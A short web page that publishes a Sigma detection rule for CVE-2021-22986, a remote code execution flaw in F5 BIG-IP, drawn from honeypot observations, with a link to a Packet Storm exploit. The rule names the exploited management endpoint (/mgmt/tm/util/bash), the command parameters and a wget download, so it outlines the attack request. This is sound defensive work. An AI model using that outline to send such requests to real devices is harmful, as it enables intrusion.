CVE-2021-22986

Jun 28, 2021 ·

Detection of CVE-2021-22986 observed from our Honeypots

Sigma rule (View on GitHub)

 1title: CVE-2021-22986
 2status: experimental
 3description: Detection of CVE-2021-22986 observed from our Honeypots
 4references:
 5  - https://packetstormsecurity.com/files/162066/F5-BIG-IP-16.0.x-Remote-Code-Execution.html
 6author: Loginsoft Research Unit
 7date: 2021/06/15
 8logsource:
 9  product: F5 BIG-IP (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO)
10  category: Network Middleware Applications
11detection:
12  selection:
13    c-uri: "/mgmt/tm/util/bash"
14    cs-method: "POST"
15  keywords1:
16      - '"command": "run"'
17  keywords2:
18      - '"utilCmdArgs":"-c*'
19  keywords3:
20      - "wget"
21  condition: selection and keywords1 and keywords2 and keywords3
22level: High

References

F5 BIG-IP 16.0.x Remote Code Execution ≈ Packet Storm

Information Security Services, News, Files, Tools, Exploits, Advisories and Whitepapers

Read More

CVE-2021-22986

Sigma rule (View on GitHub)

References

F5 BIG-IP 16.0.x Remote Code Execution ≈ Packet Storm